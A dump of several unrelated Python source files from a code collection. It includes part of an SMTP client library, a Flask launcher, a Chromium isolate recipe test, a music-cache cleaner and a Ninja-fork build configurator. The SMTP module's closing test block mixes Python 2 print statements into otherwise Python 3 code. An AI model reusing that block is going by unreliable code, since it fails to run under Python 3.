SMTPHeloError The server didn't reply properly to
the helo greeting.
SMTPAuthenticationError The server didn't accept the username/
password combination.
SMTPNotSupportedError The AUTH command is not supported by the
server.
SMTPException No suitable authentication method was
found.
"""
self.ehlo_or_helo_if_needed()
if not self.has_extn("auth"):
raise SMTPNotSupportedError(
"SMTP AUTH extension not supported by server.")
# Authentication methods the server claims to support
advertised_authlist = self.esmtp_features["auth"].split()
# Authentication methods we can handle in our preferred order:
preferred_auths = ['CRAM-MD5', 'PLAIN', 'LOGIN']
# We try the supported authentications in our preferred order, if
# the server supports them.
authlist = [auth for auth in preferred_auths
if auth in advertised_authlist]
if not authlist:
raise SMTPException("No suitable authentication method found.")
# Some servers advertise authentication methods they don't really
# support, so if authentication fails, we continue until we've tried
# all methods.
self.user, self.password = user, password
for authmethod in authlist:
method_name = 'auth_' + authmethod.lower().replace('-', '_')
try:
(code, resp) = self.auth(
authmethod, getattr(self, method_name),
initial_response_ok=initial_response_ok)
# 235 == 'Authentication successful'
# 503 == 'Error: already authenticated'
if code in (235, 503):
return (code, resp)
except SMTPAuthenticationError as e:
last_exception = e
# We could not login successfully. Return result of last attempt.
raise last_exception
def starttls(self, keyfile=None, certfile=None, context=None):
"""Puts the connection to the SMTP server into TLS mode.
If there has been no previous EHLO or HELO command this session, this
method tries ESMTP EHLO first.
If the server supports TLS, this will encrypt the rest of the SMTP
session. If you provide the keyfile and certfile parameters,
the identity of the SMTP server and client can be checked. This,
however, depends on whether the socket module really checks the
certificates.
This method may raise the following exceptions:
SMTPHeloError The server didn't reply properly to
the helo greeting.
"""
self.ehlo_or_helo_if_needed()
if not self.has_extn("starttls"):
raise SMTPNotSupportedError(
"STARTTLS extension not supported by server.")
(resp, reply) = self.docmd("STARTTLS")
if resp == 220:
if not _have_ssl:
raise RuntimeError("No SSL support included in this Python")
if context is not None and keyfile is not None:
raise ValueError("context and keyfile arguments are mutually "
"exclusive")
if context is not None and certfile is not None:
raise ValueError("context and certfile arguments are mutually "
"exclusive")
if keyfile is not None or certfile is not None:
import warnings
warnings.warn("keyfile and certfile are deprecated, use a"
"custom context instead", DeprecationWarning, 2)
if context is None:
context = ssl._create_stdlib_context(certfile=certfile,
keyfile=keyfile)
self.sock = context.wrap_socket(self.sock,
server_hostname=self._host)
self.file = None
# RFC 3207:
# The client MUST discard any knowledge obtained from
# the server, such as the list of SMTP service extensions,
# which was not obtained from the TLS negotiation itself.
self.helo_resp = None
self.ehlo_resp = None
self.esmtp_features = {}
self.does_esmtp = 0
else:
# RFC 3207:
# 501 Syntax error (no parameters allowed)
# 454 TLS not available due to temporary reason
raise SMTPResponseException(resp, reply)
return (resp, reply)
def sendmail(self, from_addr, to_addrs, msg, mail_options=[],
rcpt_options=[]):
"""This command performs an entire mail transaction.
The arguments are:
- from_addr : The address sending this mail.
- to_addrs : A list of addresses to send this mail to. A bare
string will be treated as a list with 1 address.
- msg : The message to send.
- mail_options : List of ESMTP options (such as 8bitmime) for the
mail command.
- rcpt_options : List of ESMTP options (such as DSN commands) for
all the rcpt commands.
msg may be a string containing characters in the ASCII range, or a byte
string. A string is encoded to bytes using the ascii codec, and lone
\\r and \\n characters are converted to \\r\\n characters.
If there has been no previous EHLO or HELO command this session, this
method tries ESMTP EHLO first. If the server does ESMTP, message size
and each of the specified options will be passed to it. If EHLO
fails, HELO will be tried and ESMTP options suppressed.
This method will return normally if the mail is accepted for at least
one recipient. It returns a dictionary, with one entry for each
recipient that was refused. Each entry contains a tuple of the SMTP
error code and the accompanying error message sent by the server.
This method may raise the following exceptions:
SMTPHeloError The server didn't reply properly to
the helo greeting.
SMTPRecipientsRefused The server rejected ALL recipients
(no mail was sent).
SMTPSenderRefused The server didn't accept the from_addr.
SMTPDataError The server replied with an unexpected
error code (other than a refusal of
a recipient).
SMTPNotSupportedError The mail_options parameter includes 'SMTPUTF8'
but the SMTPUTF8 extension is not supported by
the server.
Note: the connection will be open even after an exception is raised.
Example:
>>> import smtplib
>>> s=smtplib.SMTP("localhost")
>>> tolist=["[email protected]","[email protected]","[email protected]","[email protected]"]
>>> msg = '''\\
... From: [email protected]
... Subject: testin'...
...
... This is a test '''
>>> s.sendmail("[email protected]",tolist,msg)
{ "[email protected]" : ( 550 ,"User unknown" ) }
>>> s.quit()
In the above example, the message was accepted for delivery to three
of the four addresses, and one was rejected, with the error code
550. If all addresses are accepted, then the method will return an
empty dictionary.
"""
self.ehlo_or_helo_if_needed()
esmtp_opts = []
if isinstance(msg, str):
msg = _fix_eols(msg).encode('ascii')
if self.does_esmtp:
if self.has_extn('size'):
esmtp_opts.append("size=%d" % len(msg))
for option in mail_options:
esmtp_opts.append(option)
(code, resp) = self.mail(from_addr, esmtp_opts)
if code != 250:
if code == 421:
self.close()
else:
self._rset()
raise SMTPSenderRefused(code, resp, from_addr)
senderrs = {}
if isinstance(to_addrs, str):
to_addrs = [to_addrs]
for each in to_addrs:
(code, resp) = self.rcpt(each, rcpt_options)
if (code != 250) and (code != 251):
senderrs[each] = (code, resp)
if code == 421:
self.close()
raise SMTPRecipientsRefused(senderrs)
if len(senderrs) == len(to_addrs):
# the server refused all our recipients
self._rset()
raise SMTPRecipientsRefused(senderrs)
(code, resp) = self.data(msg)
if code != 250:
if code == 421:
self.close()
else:
self._rset()
raise SMTPDataError(code, resp)
#if we got here then somebody got our mail
return senderrs
def send_message(self, msg, from_addr=None, to_addrs=None,
mail_options=[], rcpt_options={}):
"""Converts message to a bytestring and passes it to sendmail.
The arguments are as for sendmail, except that msg is an
email.message.Message object. If from_addr is None or to_addrs is
None, these arguments are taken from the headers of the Message as
described in RFC 2822 (a ValueError is raised if there is more than
one set of 'Resent-' headers). Regardless of the values of from_addr and
to_addr, any Bcc field (or Resent-Bcc field, when the Message is a
resent) of the Message object won't be transmitted. The Message
object is then serialized using email.generator.BytesGenerator and
sendmail is called to transmit the message. If the sender or any of
the recipient addresses contain non-ASCII and the server advertises the
SMTPUTF8 capability, the policy is cloned with utf8 set to True for the
serialization, and SMTPUTF8 and BODY=8BITMIME are asserted on the send.
If the server does not support SMTPUTF8, an SMTPNotSupported error is
raised. Otherwise the generator is called without modifying the
policy.
"""
# 'Resent-Date' is a mandatory field if the Message is resent (RFC 2822
# Section 3.6.6). In such a case, we use the 'Resent-*' fields. However,
# if there is more than one 'Resent-' block there's no way to
# unambiguously determine which one is the most recent in all cases,
# so rather than guess we raise a ValueError in that case.
#
# TODO implement heuristics to guess the correct Resent-* block with an
# option allowing the user to enable the heuristics. (It should be
# possible to guess correctly almost all of the time.)
self.ehlo_or_helo_if_needed()
resent = msg.get_all('Resent-Date')
if resent is None:
header_prefix = ''
elif len(resent) == 1:
header_prefix = 'Resent-'
else:
raise ValueError("message has more than one 'Resent-' header block")
if from_addr is None:
# Prefer the sender field per RFC 2822:3.6.2.
from_addr = (msg[header_prefix + 'Sender']
if (header_prefix + 'Sender') in msg
else msg[header_prefix + 'From'])
from_addr = email.utils.getaddresses([from_addr])[0][1]
if to_addrs is None:
addr_fields = [f for f in (msg[header_prefix + 'To'],
msg[header_prefix + 'Bcc'],
msg[header_prefix + 'Cc'])
if f is not None]
to_addrs = [a[1] for a in email.utils.getaddresses(addr_fields)]
# Make a local copy so we can delete the bcc headers.
msg_copy = copy.copy(msg)
del msg_copy['Bcc']
del msg_copy['Resent-Bcc']
international = False
try:
''.join([from_addr, *to_addrs]).encode('ascii')
except UnicodeEncodeError:
if not self.has_extn('smtputf8'):
raise SMTPNotSupportedError(
"One or more source or delivery addresses require"
" internationalized email support, but the server"
" does not advertise the required SMTPUTF8 capability")
international = True
with io.BytesIO() as bytesmsg:
if international:
g = email.generator.BytesGenerator(
bytesmsg, policy=msg.policy.clone(utf8=True))
mail_options += ['SMTPUTF8', 'BODY=8BITMIME']
else:
g = email.generator.BytesGenerator(bytesmsg)
g.flatten(msg_copy, linesep='\r\n')
flatmsg = bytesmsg.getvalue()
return self.sendmail(from_addr, to_addrs, flatmsg, mail_options,
rcpt_options)
def close(self):
"""Close the connection to the SMTP server."""
try:
file = self.file
self.file = None
if file:
file.close()
finally:
sock = self.sock
self.sock = None
if sock:
sock.close()
def quit(self):
"""Terminate the SMTP session."""
res = self.docmd("quit")
# A new EHLO is required after reconnecting with connect()
self.ehlo_resp = self.helo_resp = None
self.esmtp_features = {}
self.does_esmtp = False
self.close()
return res
if _have_ssl:
class SMTP_SSL(SMTP):
""" This is a subclass derived from SMTP that connects over an SSL
encrypted socket (to use this class you need a socket module that was
compiled with SSL support). If host is not specified, '' (the local
host) is used. If port is omitted, the standard SMTP-over-SSL port
(465) is used. local_hostname and source_address have the same meaning
as they do in the SMTP class. keyfile and certfile are also optional -
they can contain a PEM formatted private key and certificate chain file
for the SSL connection. context also optional, can contain a
SSLContext, and is an alternative to keyfile and certfile; If it is
specified both keyfile and certfile must be None.
"""
default_port = SMTP_SSL_PORT
def __init__(self, host='', port=0, local_hostname=None,
keyfile=None, certfile=None,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None, context=None):
if context is not None and keyfile is not None:
raise ValueError("context and keyfile arguments are mutually "
"exclusive")
if context is not None and certfile is not None:
raise ValueError("context and certfile arguments are mutually "
"exclusive")
if keyfile is not None or certfile is not None:
import warnings
warnings.warn("keyfile and certfile are deprecated, use a"
"custom context instead", DeprecationWarning, 2)
self.keyfile = keyfile
self.certfile = certfile
if context is None:
context = ssl._create_stdlib_context(certfile=certfile,
keyfile=keyfile)
self.context = context
SMTP.__init__(self, host, port, local_hostname, timeout,
source_address)
def _get_socket(self, host, port, timeout):
if self.debuglevel > 0:
self._print_debug('connect:', (host, port))
new_socket = socket.create_connection((host, port), timeout,
self.source_address)
new_socket = self.context.wrap_socket(new_socket,
server_hostname=self._host)
return new_socket
__all__.append("SMTP_SSL")
#
# LMTP extension
#
LMTP_PORT = 2003
class LMTP(SMTP):
"""LMTP - Local Mail Transfer Protocol
The LMTP protocol, which is very similar to ESMTP, is heavily based
on the standard SMTP client. It's common to use Unix sockets for
LMTP, so our connect() method must support that as well as a regular
host:port server. local_hostname and source_address have the same
meaning as they do in the SMTP class. To specify a Unix socket,
you must use an absolute path as the host, starting with a '/'.
Authentication is supported, using the regular SMTP mechanism. When
using a Unix socket, LMTP generally don't support or require any
authentication, but your mileage might vary."""
ehlo_msg = "lhlo"
def __init__(self, host='', port=LMTP_PORT, local_hostname=None,
source_address=None):
"""Initialize a new instance."""
SMTP.__init__(self, host, port, local_hostname=local_hostname,
source_address=source_address)
def connect(self, host='localhost', port=0, source_address=None):
"""Connect to the LMTP daemon, on either a Unix or a TCP socket."""
if host[0] != '/':
return SMTP.connect(self, host, port, source_address=source_address)
# Handle Unix-domain sockets.
try:
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.file = None
self.sock.connect(host)
except OSError:
if self.debuglevel > 0:
self._print_debug('connect fail:', host)
if self.sock:
self.sock.close()
self.sock = None
raise
(code, msg) = self.getreply()
if self.debuglevel > 0:
self._print_debug('connect:', msg)
return (code, msg)
# Test the sendmail method, which tests most of the others.
# Note: This always sends to localhost.
if __name__ == '__main__':
def prompt(prompt):
sys.stdout.write(prompt + ": ")
sys.stdout.flush()
return sys.stdin.readline().strip()
fromaddr = prompt("From")
toaddrs = prompt("To").split(',')
print "Enter message, end with ^D:"
msg = ''
while 1:
line = sys.stdin.readline()
if not line:
break
msg = msg + line
print "Message length is %d" % len(msg)
server = SMTP('localhost')
server.set_debuglevel(1)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
|
py | 7df9ff6918bd759550ade298c8c78d1745616b95 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
class InvalidExpenseApproverError(frappe.ValidationError): pass
class ExpenseApproverIdentityError(frappe.ValidationError): pass
class ExpenseClaim(Document):
pass
|
py | 7dfa00900188b0b014406401e76aac1887c7a49c | from app import create_app
import logging
from logging.config import dictConfig
from logconfig import LogConfig
config = LogConfig(info_file=r'data/courtLoseCredit.log', err_file=r'data/courtLoseCreditErr.log').log_config
logging.config.dictConfig(config)
application_court = create_app()
if __name__ == '__main__':
application_court.run(host='0.0.0.0', port=5002)
|
py | 7dfa009f65080533cbd836d942429b41861f5206 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# TODO(borenet): This module was copied from build.git and heavily modified to
# remove dependencies on other modules in build.git. It belongs in a different
# repo. Remove this once it has been moved.
from recipe_engine.recipe_api import Property
DEPS = [
'isolate',
'recipe_engine/json',
'recipe_engine/path',
'recipe_engine/properties',
'recipe_engine/step',
'swarming_client',
]
PROPERTIES = {
'always_use_exparchive': Property(
kind=bool, help="Force usage of exparchive.", default=False),
}
def RunSteps(api, always_use_exparchive):
# 'isolate_tests' step needs swarming checkout.
api.swarming_client.checkout('master')
# Code coverage for isolate_server property.
api.isolate.isolate_server = 'https://isolateserver-dev.appspot.com'
assert api.isolate.isolate_server == 'https://isolateserver-dev.appspot.com'
# That would read a list of files to search for, generated in GenTests.
step_result = api.step('read test spec', ['cat'], stdout=api.json.output())
expected_targets = step_result.stdout
build_path = api.isolate.package_repo_resource()
# Generates code coverage for find_isolated_tests corner cases.
# TODO(vadimsh): This step doesn't actually make any sense when the recipe
# is running for real via run_recipe.py.
api.isolate.find_isolated_tests(build_path, expected_targets)
# Code coverage for 'isolate_tests'. 'isolated_test' doesn't support discovery
# of isolated targets in build directory, so skip if 'expected_targets' is
# None.
if expected_targets is not None:
api.isolate.isolate_tests(
build_path, expected_targets,
always_use_exparchive=always_use_exparchive)
def GenTests(api):
def make_test(
name,
expected_batcharchive_targets,
expected_exparchive_targets,
discovered_targets):
if expected_batcharchive_targets or expected_exparchive_targets:
all_expected_targets = (
(expected_batcharchive_targets or []) +
(expected_exparchive_targets or []))
else:
all_expected_targets = None
missing = set(all_expected_targets or []) - set(discovered_targets or [])
output = (
api.test(name) +
api.step_data(
'read test spec',
stdout=api.json.output(all_expected_targets)) +
api.override_step_data(
'find isolated tests',
api.isolate.output_json(discovered_targets))
)
# See comment around 'if expected_targets is not None' above.
if all_expected_targets:
for target in sorted(expected_exparchive_targets):
output += api.override_step_data(
'isolate %s' % target,
api.isolate.output_json([target], missing))
if expected_batcharchive_targets:
output += api.override_step_data(
'isolate tests',
api.isolate.output_json(expected_batcharchive_targets, missing))
return output
# Expected targets == found targets.
yield make_test(
'basic', ['test1', 'test2'], [], ['test1', 'test2'])
# No expectations, just discovering what's there returned by default mock.
yield make_test(
'discover', None, None, None)
# Found more than expected.
yield make_test(
'extra', ['test1', 'test2'], [], ['test1', 'test2', 'extra_test'])
# Didn't find something.
yield (
make_test('missing', ['test1', 'test2'], [], ['test1']) +
api.properties.generic(buildername='Windows Swarm Test'))
# No expectations, and nothing has been found, produces warning.
yield make_test('none', None, None, [])
# Test the `exparchive` cases
# Only exparchive
yield make_test(
'exparchive', [], ['test_exparchive'], ['test_exparchive'])
yield make_test(
'exparchive-miss', [], ['test_exparchive'], [])
yield make_test(
'exparchive-multi',
[],
['test1_exparchive', 'test2_exparchive'],
['test1_exparchive', 'test2_exparchive'])
yield make_test(
'exparchive-multi-miss',
[],
['test1_exparchive', 'test2_exparchive'],
['test1_exparchive'])
# Mixed
yield make_test(
'exparchive-batch',
['test1', 'test2'],
['test_exparchive'],
['test1', 'test2', 'test_exparchive'])
yield make_test(
'exparchive-batch-bmiss',
['test1', 'test2'],
['test_exparchive'],
['test1', 'test_exparchive'])
yield make_test(
'exparchive-batch-emiss',
['test1', 'test2'],
['test_exparchive'],
['test1', 'test2'])
# Use force-exparchive
yield make_test(
'always-use-exparchive',
[],
['test_exparchive', 'test1', 'test2'],
['test_exparchive', 'test1', 'test2']) + api.properties(
always_use_exparchive=True)
|
py | 7dfa01ca2f2ff1af004c156f75b46d79f1d25f4f | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 3 15:01:34 2014
@author: Matti Ropo
@author: Henrik Levämäki
"""
from pyemto.latticeinputs.latticeinputs import Latticeinputs
|
py | 7dfa0311d68f0f6de5e15947cb1b38a46eb339b5 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2019-04-26 11:38:54
# @Author : Lewis Tian ([email protected])
# @Link : https://github.com/taseikyo
# @Version : Python3.7
import os
import sys
"""
clear netease-cloud-music cache
for `load music failed` error
cache default path:
`c:/users/xyz/appdata/local/netease/cloudmusic/cache`
"""
def clear_netease_cloud_music_cache(path: str = ".") -> None:
"""
$path: music cache path
"""
for file in os.listdir(path):
if os.path.isdir(f"{path}/{file}"):
clear_netease_cloud_music_cache(f"{path}/{file}")
else:
try:
os.remove(f"{path}/{file}")
except:
print(f"can not remove `{path}/{file}`")
if __name__ == "__main__":
if len(sys.argv) < 2:
path = f"{os.environ['LOCALAPPDATA']}/netease/cloudmusic/cache"
else:
path = sys.argv[1]
clear_netease_cloud_music_cache(path)
|
py | 7dfa03ac9da7432d0763fe59ca5db422cf7de779 | from happy_bittorrent.algorithms.torrent_manager import *
|
py | 7dfa04db74c583287c261b7062c400e70518a05a | #!/usr/bin/env python
#
# Copyright 2001 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Script that generates the build.ninja for shinobi itself.
Projects that use shinobi themselves should either write a similar script
or use a meta-build system that supports Ninja output."""
from __future__ import print_function
from optparse import OptionParser
import os
import pipes
import string
import subprocess
import sys
sourcedir = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(sourcedir, 'misc'))
import ninja_syntax
class Platform(object):
"""Represents a host/target platform and its specific build attributes."""
def __init__(self, platform):
self._platform = platform
if self._platform is not None:
return
self._platform = sys.platform
if self._platform.startswith('linux'):
self._platform = 'linux'
elif self._platform.startswith('freebsd'):
self._platform = 'freebsd'
elif self._platform.startswith('gnukfreebsd'):
self._platform = 'freebsd'
elif self._platform.startswith('openbsd'):
self._platform = 'openbsd'
elif self._platform.startswith('solaris') or self._platform == 'sunos5':
self._platform = 'solaris'
elif self._platform.startswith('mingw'):
self._platform = 'mingw'
elif self._platform.startswith('win'):
self._platform = 'msvc'
elif self._platform.startswith('bitrig'):
self._platform = 'bitrig'
elif self._platform.startswith('netbsd'):
self._platform = 'netbsd'
elif self._platform.startswith('aix'):
self._platform = 'aix'
elif self._platform.startswith('os400'):
self._platform = 'os400'
elif self._platform.startswith('dragonfly'):
self._platform = 'dragonfly'
@staticmethod
def known_platforms():
return ['linux', 'darwin', 'freebsd', 'openbsd', 'solaris', 'sunos5',
'mingw', 'msvc', 'gnukfreebsd', 'bitrig', 'netbsd', 'aix',
'dragonfly']
def platform(self):
return self._platform
def is_linux(self):
return self._platform == 'linux'
def is_mingw(self):
return self._platform == 'mingw'
def is_msvc(self):
return self._platform == 'msvc'
def msvc_needs_fs(self):
popen = subprocess.Popen(['cl', '/nologo', '/?'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
return b'/FS' in out
def is_windows(self):
return self.is_mingw() or self.is_msvc()
def is_solaris(self):
return self._platform == 'solaris'
def is_aix(self):
return self._platform == 'aix'
def is_os400_pase(self):
return self._platform == 'os400' or os.uname().sysname.startswith('OS400')
def uses_usr_local(self):
return self._platform in ('freebsd', 'openbsd', 'bitrig', 'dragonfly', 'netbsd')
def supports_ppoll(self):
return self._platform in ('freebsd', 'linux', 'openbsd', 'bitrig',
'dragonfly')
def supports_ninja_browse(self):
return (not self.is_windows()
and not self.is_solaris()
and not self.is_aix())
def can_rebuild_in_place(self):
return not (self.is_windows() or self.is_aix())
class Bootstrap:
"""API shim for ninja_syntax.Writer that instead runs the commands.
Used to bootstrap Ninja from scratch. In --bootstrap mode this
class is used to execute all the commands to build an executable.
It also proxies all calls to an underlying ninja_syntax.Writer, to
behave like non-bootstrap mode.
"""
def __init__(self, writer, verbose=False):
self.writer = writer
self.verbose = verbose
# Map of variable name => expanded variable value.
self.vars = {}
# Map of rule name => dict of rule attributes.
self.rules = {
'phony': {}
}
def comment(self, text):
return self.writer.comment(text)
def newline(self):
return self.writer.newline()
def variable(self, key, val):
# In bootstrap mode, we have no shinobi process to catch /showIncludes
# output.
self.vars[key] = self._expand(val).replace('/showIncludes', '')
return self.writer.variable(key, val)
def rule(self, name, **kwargs):
self.rules[name] = kwargs
return self.writer.rule(name, **kwargs)
def build(self, outputs, rule, inputs=None, **kwargs):
ruleattr = self.rules[rule]
cmd = ruleattr.get('command')
if cmd is None: # A phony rule, for example.
return
# Implement just enough of Ninja variable expansion etc. to
# make the bootstrap build work.
local_vars = {
'in': self._expand_paths(inputs),
'out': self._expand_paths(outputs)
}
for key, val in kwargs.get('variables', []):
local_vars[key] = ' '.join(ninja_syntax.as_list(val))
self._run_command(self._expand(cmd, local_vars))
return self.writer.build(outputs, rule, inputs, **kwargs)
def default(self, paths):
return self.writer.default(paths)
def _expand_paths(self, paths):
"""Expand $vars in an array of paths, e.g. from a 'build' block."""
paths = ninja_syntax.as_list(paths)
return ' '.join(map(self._shell_escape, (map(self._expand, paths))))
def _expand(self, str, local_vars={}):
"""Expand $vars in a string."""
return ninja_syntax.expand(str, self.vars, local_vars)
def _shell_escape(self, path):
"""Quote paths containing spaces."""
return '"%s"' % path if ' ' in path else path
def _run_command(self, cmdline):
"""Run a subcommand, quietly. Prints the full command on error."""
try:
if self.verbose:
print(cmdline)
subprocess.check_call(cmdline, shell=True)
except subprocess.CalledProcessError:
print('when running: ', cmdline)
raise
parser = OptionParser()
profilers = ['gmon', 'pprof']
parser.add_option('--bootstrap', action='store_true',
help='bootstrap a shinobi binary from nothing')
parser.add_option('--verbose', action='store_true',
help='enable verbose build')
parser.add_option('--platform',
help='target platform (' +
'/'.join(Platform.known_platforms()) + ')',
choices=Platform.known_platforms())
parser.add_option('--host',
help='host platform (' +
'/'.join(Platform.known_platforms()) + ')',
choices=Platform.known_platforms())
parser.add_option('--debug', action='store_true',
help='enable debugging extras',)
parser.add_option('--profile', metavar='TYPE',
choices=profilers,
help='enable profiling (' + '/'.join(profilers) + ')',)
parser.add_option('--with-gtest', metavar='PATH', help='ignored')
parser.add_option('--with-python', metavar='EXE',
help='use EXE as the Python interpreter',
default=os.path.basename(sys.executable))
parser.add_option('--force-pselect', action='store_true',
help='ppoll() is used by default where available, '
'but some platforms may need to use pselect instead',)
(options, args) = parser.parse_args()
if args:
print('ERROR: extra unparsed command-line arguments:', args)
sys.exit(1)
platform = Platform(options.platform)
if options.host:
host = Platform(options.host)
else:
host = platform
BUILD_FILENAME = 'build.ninja'
shinobi_writer = ninja_syntax.Writer(open(BUILD_FILENAME, 'w'))
n = shinobi_writer
if options.bootstrap:
# Make the build directory.
try:
os.mkdir('build')
except OSError:
pass
# Wrap shinobi_writer with the Bootstrapper, which also executes the
# commands.
print('bootstrapping shinobi...')
n = Bootstrap(n, verbose=options.verbose)
n.comment('This file is used to build shinobi itself.')
n.comment('It is generated by ' + os.path.basename(__file__) + '.')
n.newline()
n.variable('ninja_required_version', '1.3')
n.newline()
n.comment('The arguments passed to configure.py, for rerunning it.')
configure_args = sys.argv[1:]
if '--bootstrap' in configure_args:
configure_args.remove('--bootstrap')
n.variable('configure_args', ' '.join(configure_args))
env_keys = set(['CXX', 'AR', 'CFLAGS', 'CXXFLAGS', 'LDFLAGS'])
configure_env = dict((k, os.environ[k]) for k in os.environ if k in env_keys)
if configure_env:
config_str = ' '.join([k + '=' + pipes.quote(configure_env[k])
for k in configure_env])
n.variable('configure_env', config_str + '$ ')
n.newline()
CXX = configure_env.get('CXX', 'g++')
objext = '.o'
if platform.is_msvc():
CXX = 'cl'
objext = '.obj'
def src(filename):
return os.path.join('$root', 'src', filename)
def built(filename):
return os.path.join('$builddir', filename)
def doc(filename):
return os.path.join('$root', 'doc', filename)
def cc(name, **kwargs):
return n.build(built(name + objext), 'cxx', src(name + '.c'), **kwargs)
def cxx(name, **kwargs):
return n.build(built(name + objext), 'cxx', src(name + '.cc'), **kwargs)
def binary(name):
if platform.is_windows():
exe = name + '.exe'
n.build(name, 'phony', exe)
return exe
return name
root = sourcedir
if root == os.getcwd():
# In the common case where we're building directly in the source
# tree, simplify all the paths to just be cwd-relative.
root = '.'
n.variable('root', root)
n.variable('builddir', 'build')
n.variable('cxx', CXX)
if platform.is_msvc():
n.variable('ar', 'link')
else:
n.variable('ar', configure_env.get('AR', 'ar'))
if platform.is_msvc():
cflags = ['/showIncludes',
'/nologo', # Don't print startup banner.
'/Zi', # Create pdb with debug info.
'/W4', # Highest warning level.
'/WX', # Warnings as errors.
'/wd4530', '/wd4100', '/wd4706', '/wd4244',
'/wd4512', '/wd4800', '/wd4702', '/wd4819',
# Disable warnings about constant conditional expressions.
'/wd4127',
# Disable warnings about passing "this" during initialization.
'/wd4355',
# Disable warnings about ignored typedef in DbgHelp.h
'/wd4091',
# Disable size_t -> int truncation warning.
# We never have strings or arrays larger than 2**31.
'/wd4267',
'/DNOMINMAX', '/D_CRT_SECURE_NO_WARNINGS',
'/DNINJA_PYTHON="%s"' % options.with_python]
if platform.msvc_needs_fs():
cflags.append('/FS')
ldflags = ['/DEBUG', '/libpath:$builddir']
if not options.debug:
cflags += ['/Ox', '/DNDEBUG', '/GL']
ldflags += ['/LTCG', '/OPT:REF', '/OPT:ICF']
else:
cflags = ['-g', '-Wall', '-Wextra',
'-Wno-deprecated',
'-Wno-missing-field-initializers',
'-Wno-unused-parameter',
'-fvisibility=hidden', '-pipe',
'-std=c++17',
'-DNINJA_PYTHON="%s"' % options.with_python]
if options.debug:
cflags += ['-D_GLIBCXX_DEBUG', '-D_GLIBCXX_DEBUG_PEDANTIC']
else:
cflags += ['-O2', '-DNDEBUG']
try:
proc = subprocess.Popen(
[CXX, '-fdiagnostics-color', '-c', '-x', 'c++', '/dev/null',
'-o', '/dev/null'],
stdout=open(os.devnull, 'wb'), stderr=subprocess.STDOUT)
if proc.wait() == 0:
cflags += ['-fdiagnostics-color']
except:
pass
if platform.is_mingw():
cflags += ['-D_WIN32_WINNT=0x0601', '-D__USE_MINGW_ANSI_STDIO=1']
ldflags = ['-L$builddir', '-lboost_system', '-pthread']
if platform.uses_usr_local():
cflags.append('-I/usr/local/include')
ldflags.append('-L/usr/local/lib')
if platform.is_aix():
# printf formats for int64_t, uint64_t; large file support
cflags.append('-D__STDC_FORMAT_MACROS')
cflags.append('-D_LARGE_FILES')
libs = []
if platform.is_mingw():
cflags.remove('-fvisibility=hidden');
ldflags.append('-static')
elif platform.is_solaris():
cflags.remove('-fvisibility=hidden')
elif platform.is_aix():
cflags.remove('-fvisibility=hidden')
elif platform.is_msvc():
pass
else:
if options.profile == 'gmon':
cflags.append('-pg')
ldflags.append('-pg')
elif options.profile == 'pprof':
cflags.append('-fno-omit-frame-pointer')
libs.extend(['-Wl,--no-as-needed', '-lprofiler'])
if platform.supports_ppoll() and not options.force_pselect:
cflags.append('-DUSE_PPOLL')
if platform.supports_ninja_browse():
cflags.append('-DNINJA_HAVE_BROWSE')
# Search for generated headers relative to build dir.
cflags.append('-I.')
def shell_escape(str):
"""Escape str such that it's interpreted as a single argument by
the shell."""
# This isn't complete, but it's just enough to make NINJA_PYTHON work.
if platform.is_windows():
return str
if '"' in str:
return "'%s'" % str.replace("'", "\\'")
return str
if 'CFLAGS' in configure_env:
cflags.append(configure_env['CFLAGS'])
ldflags.append(configure_env['CFLAGS'])
if 'CXXFLAGS' in configure_env:
cflags.append(configure_env['CXXFLAGS'])
ldflags.append(configure_env['CXXFLAGS'])
n.variable('cflags', ' '.join(shell_escape(flag) for flag in cflags))
if 'LDFLAGS' in configure_env:
ldflags.append(configure_env['LDFLAGS'])
n.variable('ldflags', ' '.join(shell_escape(flag) for flag in ldflags))
n.newline()
if platform.is_msvc():
n.rule('cxx',
command='$cxx $cflags -c $in /Fo$out /Fd' + built('$pdb'),
description='CXX $out',
deps='msvc' # /showIncludes is included in $cflags.
)
else:
n.rule('cxx',
command='$cxx -MMD -MT $out -MF $out.d $cflags -c $in -o $out',
depfile='$out.d',
deps='gcc',
description='CXX $out')
n.newline()
if host.is_msvc():
n.rule('ar',
command='lib /nologo /ltcg /out:$out $in',
description='LIB $out')
elif host.is_mingw():
n.rule('ar',
command='$ar crs $out $in',
description='AR $out')
else:
n.rule('ar',
command='rm -f $out && $ar crs $out $in',
description='AR $out')
n.newline()
if platform.is_msvc():
n.rule('link',
command='$cxx $in $libs /nologo /link $ldflags /out:$out',
description='LINK $out')
else:
n.rule('link',
command='$cxx $ldflags -o $out $in $libs',
description='LINK $out')
n.newline()
objs = []
if platform.supports_ninja_browse():
n.comment('browse_py.h is used to inline browse.py.')
n.rule('inline',
command='"%s"' % src('inline.sh') + ' $varname < $in > $out',
description='INLINE $out')
n.build(built('browse_py.h'), 'inline', src('browse.py'),
implicit=src('inline.sh'),
variables=[('varname', 'kBrowsePy')])
n.newline()
objs += cxx('browse', order_only=built('browse_py.h'))
n.newline()
n.comment('the depfile parser and shinobi lexers are generated using re2c.')
def has_re2c():
try:
proc = subprocess.Popen(['re2c', '-V'], stdout=subprocess.PIPE)
return int(proc.communicate()[0], 10) >= 1103
except OSError:
return False
if has_re2c():
n.rule('re2c',
command='re2c -b -i --no-generation-date -o $out $in',
description='RE2C $out')
# Generate the .cc files in the source directory so we can check them in.
